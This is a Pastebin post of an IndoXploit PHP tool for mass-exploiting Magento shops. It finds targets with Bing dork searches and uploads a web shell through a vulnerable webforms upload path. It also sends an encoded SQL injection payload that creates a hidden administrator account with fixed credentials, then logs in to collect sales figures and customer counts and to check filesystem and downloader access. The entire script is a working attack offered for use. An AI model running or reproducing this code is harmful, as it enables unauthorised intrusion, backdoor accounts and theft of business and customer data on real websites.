daily pastebin goal
44%
SHARE
TWEET

Ched nayyk ya ghassen

a guest Jan 20th, 2017 78 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4.  
  5. class indoxploit_mage_exploit {
  6.     private $jsvulnpath = "/js/webforms/upload/";
  7.     private $postjs = "files[]";
  8.  
  9.     public function cover() {
  10.         print "[ ========================================== ]\n";
  11.         print "-----> Magento Xploit with Bing Grabber <-----\n";
  12.         print "All in One Package: [webforms,add admin] Xploit\n";
  13.         print "Coded by: l0c4lh34rtz ( Mr. Error 404 )\n";
  14.         print "Greetz: IndoXploit - Sanjungan Jiwa\n";
  15.         print "[ ========================================== ]\n\n";
  16.     }
  17.     public function ngcurl($url,$post=null) {
  18.         $ch = curl_init($url);
  19.         if($post != null) {
  20.             curl_setopt($ch, CURLOPT_POST, true);
  21.             curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  22.         }
  23.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  24.             curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  25.             curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  26.             curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  27.             curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  28.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  29.             curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  30.             curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  31.         return curl_exec($ch);
  32.             curl_close($ch);
  33.     }
  34.     public function xploit($url, $post) {
  35.         $ch = curl_init();
  36.               curl_setopt($ch, CURLOPT_URL, $url);
  37.               curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  38.               curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  39.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  40.               curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  41.               curl_setopt($ch, CURLOPT_POST, 1);
  42.         $headers  = array();
  43.         $headers[] = 'Accept-Encoding: gzip, deflate';
  44.         $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  45.               curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  46.               curl_setopt($ch, CURLOPT_HEADER, 1);
  47.         return curl_exec($ch);
  48.               curl_close($ch);
  49.     }
  50.     public function ambilKata($param, $kata1, $kata2){
  51.         if(strpos($param, $kata1) === FALSE) return FALSE;
  52.         if(strpos($param, $kata2) === FALSE) return FALSE;
  53.         $start = strpos($param, $kata1) + strlen($kata1);
  54.         $end = strpos($param, $kata2, $start);
  55.         $return = substr($param, $start, $end - $start);
  56.         return $return;
  57.     }
  58. }
  59.  
  60. $idx = new indoxploit_mage_exploit();
  61. $shell = "id.php";
  62. $dork = str_replace("'", "", $argv[1]);
  63. $dork = urlencode($dork);
  64. if(isset($dork)) {
  65.     $idx->cover();
  66.     $npage = 1;
  67.     $npages = 30000;
  68.     $allLinks = array();
  69.     $lll = array();
  70.     while($npage <= $npages) {
  71.         $x = $idx->ngcurl("http://www.bing.com/search?q=".$dork."&first=".$npage."", null);
  72.         if($x) {
  73.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  74.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  75.             $npage = $npage + 10;
  76.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  77.         } else break;
  78.     }
  79.     $URLs = array();
  80.     foreach($allLinks as $url){
  81.         $exp = explode("/", $url);
  82.         $URLs[] = $exp[2];
  83.     }
  84.     $array = array_filter($URLs);
  85.     $array = array_unique($array);
  86.     $sss = count(array_unique($array));
  87.     print "Load ($sss) sites\n";
  88.     print "<------------------------>\n\n";
  89.     foreach($array as $domain) {
  90.         if($_SESSION[$domain]) {
  91.             //
  92.         } else {
  93.         $_SESSION[$domain] = "1";  
  94.         // set var all site + path to x
  95.         $domain = "http://$domain"; // URL TARGET
  96.         $domain_exploit = $domain."/index.php/"; // URL to Exploit
  97.         $domain_exploit_add_admin = $domain_exploit."/admin/Cms_Wysiwyg/directive/index/";
  98.         $domain_downloader = $domain."/downloader/"; // URL to Downloader
  99.         $domain_admin = $domain_exploit."/admin/"; // URL to Admin Page
  100.         $domain_js = $domain."/js/webforms/upload/";
  101.         // end set varr all site + path to x
  102.         print "[+] URL: $domain ";
  103.         // set var all curl page
  104.         $cek_web = $idx->ngcurl($domain_exploit, null); // CURL to Index of site
  105.         $cek_downloader = $idx->ngcurl($domain_downloader, null); // CURL to Downloader Site
  106.         $cek_admin = $idx->ngcurl($domain_admin, null); // CURL to Admin Page
  107.         $cek_webforms = $idx->ngcurl($domain_js, null);
  108.         // end var all curl page
  109.  
  110.         // set all exploit webforms
  111.         $post_js = array("files[]" => "@$shell");
  112.         $exploit_js = $idx->ngcurl($domain_js, $post_js);
  113.         preg_match('/"url":"(.*?)"/', $exploit_js, $sh);
  114.         // end set all exploit webforms
  115.  
  116.         // set all exploit add admin
  117.         $postdata = 'filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdJbmRvWHBsb2l0JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdpbmRvJywneHBsb2l0JywnbmdhbnVAbmdhbnUuY29tJywnaW5kb3hwbG9pdCcsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZCx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgKDEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ2luZG94cGxvaXQnKSwnRmlyc3RuYW1lJyk7%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
  118.         $result = $idx->xploit($domain_exploit_add_admin, $postdata);
  119.         $ambil = htmlspecialchars(@file_get_contents($domain_admin));
  120.         preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
  121.         $post_login = array(
  122.             "form_key" => $key[1],
  123.             "login[username]" => "indoxploit",
  124.             "dummy" => "",
  125.             "login[password]" => "IndoXploit",
  126.         );
  127.         $login_web = $idx->ngcurl($domain_admin, $post_login);
  128.         preg_match_all('#<span class="price">(.*?)</span>#', $login_web, $matches);
  129.         $links = array_unique($matches[1]);
  130.         preg_match_all('/<span class=\"nowrap\" style=\"font-size:18px; color:#EA7601;\">(.*?)<span/', $login_web, $quality);
  131.         $qual = array_unique($quality[1]);
  132.         $key2 = $idx->ambilKata($login_web,"/filesystem/adminhtml_filesystem/index/key/","/");
  133.         $curl_filesystem = $idx->ngcurl($domain_exploit."/filesystem/adminhtml_filesystem/index/key/$key2/", null);
  134.         $post_downloader = array(
  135.             "username" => "indoxploit",
  136.             "password" => "IndoXploit",
  137.         );
  138.         $curl_downloader = $idx->ngcurl($domain_downloader, $post_downloader);
  139.         preg_match_all("/<td class=\"first\">(.*?)<\/td>/", $curl_downloader, $pack);
  140.         $key3 = $idx->ambilKata($login_web,"/customer/index/key/","/");
  141.         $curl_customer = $idx->ngcurl($domain_exploit."/admin/customer/index/key/$key3/", null);
  142.         preg_match_all("/<span id=\"customerGrid-total-count\" class=\"no-display\">(.*?)<\/span>/", $curl_customer, $cust);
  143.         // end set all exploit add admin
  144.  
  145.         if(preg_match("/Mage.Cookies.domain/", $cek_web) OR preg_match("/magento/", $cek_downloader) OR preg_match("/magento/", $cek_admin)) {
  146.             print "[Magento]\n";
  147.             print "[ ==================================================== ]\n";
  148.             print "[+] Trying to exploit [Webforms]: ";
  149.             if(preg_match("[]", $cek_webforms) AND !preg_match("/404|Not Found|Error|Forbidden|403/i", $cek_webforms)) {
  150.                 print "Vuln | ";
  151.                 if(preg_match("/{$shell}|webforms/", $exploit_js)) {
  152.                     print "Xploited!\n";
  153.                     print "[+] Shell: ".str_replace("\\", "", $sh[1])."\n";
  154.                 } else {
  155.                     print "Not Xploited.\n";   
  156.                 }
  157.             } else {
  158.                 print "Not Vuln\n";
  159.             }
  160.             print "[+] Trying to exploit [add admin]: ";
  161.             if(preg_match('#200 OK#', $result)) {
  162.                 print "Xploited! | ";
  163.                 if(preg_match('/Log Out|indoxploit/', $login_web)) {
  164.                     print "[Login: OK]\n";
  165.                     print "[ ====================[ $$$$$$$$ ]==================== ]\n";
  166.                     print "[+] Lifetime Sales: ".$links[0]."\n";
  167.                     print "[+] Average Orders: ".$links[1]."\n";
  168.                     print "[+] Quantity Orders: ".$qual[3][0]."\n";
  169.                     print "[+] Total Customers: ".$cust[1][0]." Customers\n";
  170.                     print "[ ====================[ $$$$$$$$ ]==================== ]\n";
  171.                     print "[ ====================[ /\/\/\/\ ]==================== ]\n";
  172.                     print "[+] Filesystem: ";
  173.                     if(preg_match("/File System/", $curl_filesystem)) {
  174.                         print "Found!\n";
  175.                     } else {
  176.                         print "Not Found.\n";
  177.                     }
  178.                     print "[+] Downloader: ";
  179.                     if(preg_match("/Magento Downloader/", $cek_downloader)) {
  180.                         print "Found! | ";
  181.                         if(preg_match("/Return to Admin|Log Out/i", $curl_downloader)) {
  182.                             if(preg_match("/Your Magento folder does not have sufficient write permissions./", $curl_downloader)) {
  183.                                 $stat_down = "Not Writeable.";
  184.                             } else {
  185.                                 $stat_down = "Writeable";
  186.                             }
  187.                             $in = 0;
  188.                             print "[Login: OK] [$stat_down]\n";
  189.                             //print "[+] Packages installed: \n";
  190.                             foreach($pack[1] as $packages) {
  191.                                 $in++;
  192.                                 //print "-> $packages\n";
  193.                             }
  194.                             print "[+] Installed packages: (".$in.") Packages\n";
  195.                         } else {
  196.                             print "[Login Downloader Failed]\n";
  197.                         }
  198.                     } else {
  199.                         print "[Not Found]\n";
  200.                     }
  201.                     print "[ ====================[ \/\/\/\/ ]==================== ]\n";
  202.                     print "[ ==================================================== ]\n";
  203.                     print "[+] username: indoxploit\n";
  204.                     print "[+] password: IndoXploit\n";
  205.                     print "[+] Login Admin: $domain_admin\n";
  206.                     print "[ ==================================================== ]\n\n";
  207.                 } else {
  208.                     print "[Login Admin Failed]\n\n";
  209.                 }
  210.             } else {
  211.                 print "Not Vuln\n\n";
  212.             }
  213.         } else {
  214.             print "[Not Magento]\n\n";
  215.         }
  216.         }
  217.     }
  218. } else {
  219.     print "usage: php ".$argv[0]." 'bing_dork'\n";
  220. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top